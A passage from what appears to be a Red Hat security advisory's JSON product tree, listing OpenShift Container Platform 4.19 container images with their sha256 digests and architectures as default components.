"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64"
},
